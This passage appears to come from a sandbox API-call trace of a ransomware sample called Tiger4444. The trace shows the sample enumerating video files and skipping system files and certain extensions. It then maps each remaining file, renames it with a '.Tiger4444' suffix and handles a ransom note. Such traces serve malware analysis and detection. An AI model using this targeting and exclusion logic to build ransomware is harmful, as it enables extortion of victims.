gmDnAcszsLl\\xBzkCKlaqOVT0MjkjP6.mp4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\xbzkcklaqovt0mjkjp6.mp4.tiger4444"), dwFlags=0x1) returned 1 [0045.281] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=36736 | out: Addend=0xc6f980) returned 16119936 [0045.281] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4437 [0045.281] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4cab860, ftCreationTime.dwHighDateTime=0x1d4d58c, ftLastAccessTime.dwLowDateTime=0x7dbf120, ftLastAccessTime.dwHighDateTime=0x1d4cf8d, ftLastWriteTime.dwLowDateTime=0x7dbf120, ftLastWriteTime.dwHighDateTime=0x1d4cf8d, nFileSizeHigh=0x0, nFileSizeLow=0x8f72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xBzkCKlaqOVT0MjkjP6.mp4", cAlternateFileName="XBZKCK~1.MP4")) returned 0 [0045.281] FindClose (in: hFindFile=0xc72fc8 | out: hFindFile=0xc72fc8) returned 1 [0045.281] lstrcpyW (in: lpString1=0x30aeafc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.281] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.281] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.281] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.282] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.282] CloseHandle (hObject=0x260) returned 1 [0045.282] CloseHandle (hObject=0x2ac) returned 1 [0045.283] GetCurrentThreadId () returned 0xfa8 [0045.283] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66608 [0045.283] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0") returned="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0" [0045.283] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0045.283] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66600 | out: hHeap=0xc50000) returned 1 [0045.283] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0") returned="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0" [0045.283] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\") returned="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\" [0045.283] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\.BFC0E91B00AE8A0620D3" [0045.283] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.286] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.288] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.289] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.289] CloseHandle (hObject=0x2ac) returned 1 [0045.290] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0") returned 40 [0045.290] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.290] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc126d0, ftCreationTime.dwHighDateTime=0x1d4d59a, ftLastAccessTime.dwLowDateTime=0x51a96bd0, ftLastAccessTime.dwHighDateTime=0x1d4cfcd, ftLastWriteTime.dwLowDateTime=0x8002a897, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0045.290] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.290] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.290] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.290] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.290] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc126d0, ftCreationTime.dwHighDateTime=0x1d4d59a, ftLastAccessTime.dwLowDateTime=0x51a96bd0, ftLastAccessTime.dwHighDateTime=0x1d4cfcd, ftLastWriteTime.dwLowDateTime=0x8002a897, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.290] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.290] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.290] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.290] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.290] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.290] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8002a897, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8002a897, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8002a897, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.290] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.290] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.290] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ab39da0, ftCreationTime.dwHighDateTime=0x1d4d516, ftLastAccessTime.dwLowDateTime=0x5c28e610, ftLastAccessTime.dwHighDateTime=0x1d4cfed, ftLastWriteTime.dwLowDateTime=0x5c28e610, ftLastWriteTime.dwHighDateTime=0x1d4cfed, nFileSizeHigh=0x0, nFileSizeLow=0xcd13, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="82zMDESjlfgM7otH 3.avi", cAlternateFileName="82ZMDE~1.AVI")) returned 1 [0045.290] lstrcmpiW (lpString1="82zMDESjlfgM7otH 3.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.290] lstrcmpiW (lpString1="82zMDESjlfgM7otH 3.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.290] lstrcmpiW (lpString1="82zMDESjlfgM7otH 3.avi", lpString2="Tiger4444.exe") returned -1 [0045.290] lstrcmpiW (lpString1="82zMDESjlfgM7otH 3.avi", lpString2=".") returned 1 [0045.290] lstrcmpiW (lpString1="82zMDESjlfgM7otH 3.avi", lpString2="..") returned 1 [0045.290] lstrcmpiW (lpString1="82zMDESjlfgM7otH 3.avi", lpString2="windows") returned -1 [0045.290] lstrcmpiW (lpString1="82zMDESjlfgM7otH 3.avi", lpString2="bootmgr") returned -1 [0045.290] lstrcmpiW (lpString1="82zMDESjlfgM7otH 3.avi", lpString2="pagefile.sys") returned -1 [0045.290] lstrcmpiW (lpString1="82zMDESjlfgM7otH 3.avi", lpString2="boot") returned -1 [0045.290] lstrcmpiW (lpString1="82zMDESjlfgM7otH 3.avi", lpString2="ids.txt") returned -1 [0045.290] lstrcmpiW (lpString1="82zMDESjlfgM7otH 3.avi", lpString2="NTUSER.DAT") returned -1 [0045.290] lstrcpyW (in: lpString1=0x30aeafa, lpString2="82zMDESjlfgM7otH 3.avi" | out: lpString1="82zMDESjlfgM7otH 3.avi") returned="82zMDESjlfgM7otH 3.avi" [0045.290] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\82zMDESjlfgM7otH 3.avi", dwFileAttributes=0x0) returned 1 [0045.291] lstrlenW (lpString="82zMDESjlfgM7otH 3.avi") returned 22 [0045.291] lstrlenW (lpString="Tiger4444") returned 9 [0045.291] lstrcmpiW (lpString1="otH 3.avi", lpString2="Tiger4444") returned -1 [0045.291] lstrlenW (lpString=".dll") returned 4 [0045.291] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0045.291] lstrlenW (lpString=".lnk") returned 4 [0045.291] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0045.291] lstrlenW (lpString=".ini") returned 4 [0045.291] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0045.291] lstrlenW (lpString=".sys") returned 4 [0045.291] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0045.291] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\82zMDESjlfgM7otH 3.avi" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\82zmdesjlfgm7oth 3.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.291] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.291] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13674427840) returned 1 [0045.291] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=52499) returned 1 [0045.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0045.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0045.291] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd020, lpName=0x0) returned 0x2c8 [0045.292] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd020) returned 0xbe0000 [0045.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0045.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0045.294] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13674688576) returned 1 [0045.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0045.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0045.294] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.294] CloseHandle (hObject=0x2c8) returned 1 [0045.294] CloseHandle (hObject=0x260) returned 1 [0045.297] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\82zMDESjlfgM7otH 3.avi.Tiger4444") returned 73 [0045.297] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\82zMDESjlfgM7otH 3.avi" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\82zmdesjlfgm7oth 3.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\82zMDESjlfgM7otH 3.avi.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\82zmdesjlfgm7oth 3.avi.tiger4444"), dwFlags=0x1) returned 1 [0045.298] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=52512 | out: Addend=0xc6f980) returned 16156672 [0045.298] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4439 [0045.298] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x383cd290, ftCreationTime.dwHighDateTime=0x1d4d0c2, ftLastAccessTime.dwLowDateTime=0x22c7f0, ftLastAccessTime.dwHighDateTime=0x1d4c8cc, ftLastWriteTime.dwLowDateTime=0x22c7f0, ftLastWriteTime.dwHighDateTime=0x1d4c8cc, nFileSizeHigh=0x0, nFileSizeLow=0xdd87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JCuda3TbU9_aKKvhOer.flv", cAlternateFileName="JCUDA3~1.FLV")) returned 1 [0045.298] lstrcmpiW (lpString1="JCuda3TbU9_aKKvhOer.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.298] lstrcmpiW (lpString1="JCuda3TbU9_aKKvhOer.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.298] lstrcmpiW (lpString1="JCuda3TbU9_aKKvhOer.flv", lpString2="Tiger4444.exe") returned -1 [0045.298] lstrcmpiW (lpString1="JCuda3TbU9_aKKvhOer.flv", lpString2=".") returned 1 [0045.298] lstrcmpiW (lpString1="JCuda3TbU9_aKKvhOer.flv", lpString2="..") returned 1 [0045.298] lstrcmpiW (lpString1="JCuda3TbU9_aKKvhOer.flv", lpString2="windows") returned -1 [0045.298] lstrcmpiW (lpString1="JCuda3TbU9_aKKvhOer.flv", lpString2="bootmgr") returned 1 [0045.298] lstrcmpiW (lpString1="JCuda3TbU9_aKKvhOer.flv", lpString2="pagefile.sys") returned -1 [0045.298] lstrcmpiW (lpString1="JCuda3TbU9_aKKvhOer.flv", lpString2="boot") returned 1 [0045.298] lstrcmpiW (lpString1="JCuda3TbU9_aKKvhOer.flv", lpString2="ids.txt") returned 1 [0045.298] lstrcmpiW (lpString1="JCuda3TbU9_aKKvhOer.flv", lpString2="NTUSER.DAT") returned -1 [0045.298] lstrcpyW (in: lpString1=0x30aeafa, lpString2="JCuda3TbU9_aKKvhOer.flv" | out: lpString1="JCuda3TbU9_aKKvhOer.flv") returned="JCuda3TbU9_aKKvhOer.flv" [0045.298] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\JCuda3TbU9_aKKvhOer.flv", dwFileAttributes=0x0) returned 1 [0045.298] lstrlenW (lpString="JCuda3TbU9_aKKvhOer.flv") returned 23 [0045.298] lstrlenW (lpString="Tiger4444") returned 9 [0045.298] lstrcmpiW (lpString1="vhOer.flv", lpString2="Tiger4444") returned 1 [0045.298] lstrlenW (lpString=".dll") returned 4 [0045.298] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.298] lstrlenW (lpString=".lnk") returned 4 [0045.298] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.298] lstrlenW (lpString=".ini") returned 4 [0045.298] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.298] lstrlenW (lpString=".sys") returned 4 [0045.298] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.298] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\JCuda3TbU9_aKKvhOer.flv" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\jcuda3tbu9_akkvhoer.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.299] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.299] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13675175648) returned 1 [0045.299] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=56711) returned 1 [0045.299] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0045.299] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0045.299] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe090, lpName=0x0) returned 0x2c8 [0045.299] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe090) returned 0xbe0000 [0045.301] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.301] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0045.301] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.301] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.301] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.301] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.301] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.301] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0045.301] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13675405011) returned 1 [0045.301] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0045.301] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0045.301] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.302] CloseHandle (hObject=0x2c8) returned 1 [0045.302] CloseHandle (hObject=0x260) returned 1 [0045.304] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\JCuda3TbU9_aKKvhOer.flv.Tiger4444") returned 74 [0045.304] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\JCuda3TbU9_aKKvhOer.flv" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\jcuda3tbu9_akkvhoer.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\JCuda3TbU9_aKKvhOer.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\jcuda3tbu9_akkvhoer.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.304] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=56720 | out: Addend=0xc6f980) returned 16209184 [0045.304] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4441 [0045.304] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x932a2a60, ftCreationTime.dwHighDateTime=0x1d4c5df, ftLastAccessTime.dwLowDateTime=0x85619390, ftLastAccessTime.dwHighDateTime=0x1d4c707, ftLastWriteTime.dwLowDateTime=0x85619390, ftLastWriteTime.dwHighDateTime=0x1d4c707, nFileSizeHigh=0x0, nFileSizeLow=0x11803, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qkjB9QUudeJrk jkCRq.flv", cAlternateFileName="QKJB9Q~1.FLV")) returned 1 [0045.305] lstrcmpiW (lpString1="qkjB9QUudeJrk jkCRq.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.305] lstrcmpiW (lpString1="qkjB9QUudeJrk jkCRq.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.305] lstrcmpiW (lpString1="qkjB9QUudeJrk jkCRq.flv", lpString2="Tiger4444.exe") returned -1 [0045.305] lstrcmpiW (lpString1="qkjB9QUudeJrk jkCRq.flv", lpString2=".") returned 1 [0045.305] lstrcmpiW (lpString1="qkjB9QUudeJrk jkCRq.flv", lpString2="..") returned 1 [0045.305] lstrcmpiW (lpString1="qkjB9QUudeJrk jkCRq.flv", lpString2="windows") returned -1 [0045.305] lstrcmpiW (lpString1="qkjB9QUudeJrk jkCRq.flv", lpString2="bootmgr") returned 1 [0045.305] lstrcmpiW (lpString1="qkjB9QUudeJrk jkCRq.flv", lpString2="pagefile.sys") returned 1 [0045.305] lstrcmpiW (lpString1="qkjB9QUudeJrk jkCRq.flv", lpString2="boot") returned 1 [0045.305] lstrcmpiW (lpString1="qkjB9QUudeJrk jkCRq.flv", lpString2="ids.txt") returned 1 [0045.305] lstrcmpiW (lpString1="qkjB9QUudeJrk jkCRq.flv", lpString2="NTUSER.DAT") returned 1 [0045.305] lstrcpyW (in: lpString1=0x30aeafa, lpString2="qkjB9QUudeJrk jkCRq.flv" | out: lpString1="qkjB9QUudeJrk jkCRq.flv") returned="qkjB9QUudeJrk jkCRq.flv" [0045.305] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\qkjB9QUudeJrk jkCRq.flv", dwFileAttributes=0x0) returned 1 [0045.305] lstrlenW (lpString="qkjB9QUudeJrk jkCRq.flv") returned 23 [0045.305] lstrlenW (lpString="Tiger4444") returned 9 [0045.305] lstrcmpiW (lpString1="jkCRq.flv", lpString2="Tiger4444") returned -1 [0045.305] lstrlenW (lpString=".dll") returned 4 [0045.305] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.305] lstrlenW (lpString=".lnk") returned 4 [0045.305] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.305] lstrlenW (lpString=".ini") returned 4 [0045.305] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.305] lstrlenW (lpString=".sys") returned 4 [0045.305] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.305] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\qkjB9QUudeJrk jkCRq.flv" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\qkjb9quudejrk jkcrq.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.305] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.305] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13675856771) returned 1 [0045.306] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=71683) returned 1 [0045.306] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0045.306] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0045.306] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11b10, lpName=0x0) returned 0x2c8 [0045.306] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11b10) returned 0xbe0000 [0045.307] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.307] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.307] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.307] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.307] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.308] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.308] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.308] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.308] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13676103402) returned 1 [0045.308] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0045.308] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0045.308] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.309] CloseHandle (hObject=0x2c8) returned 1 [0045.309] CloseHandle (hObject=0x260) returned 1 [0045.311] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\qkjB9QUudeJrk jkCRq.flv.Tiger4444") returned 74 [0045.311] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\qkjB9QUudeJrk jkCRq.flv" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\qkjb9quudejrk jkcrq.flv"), 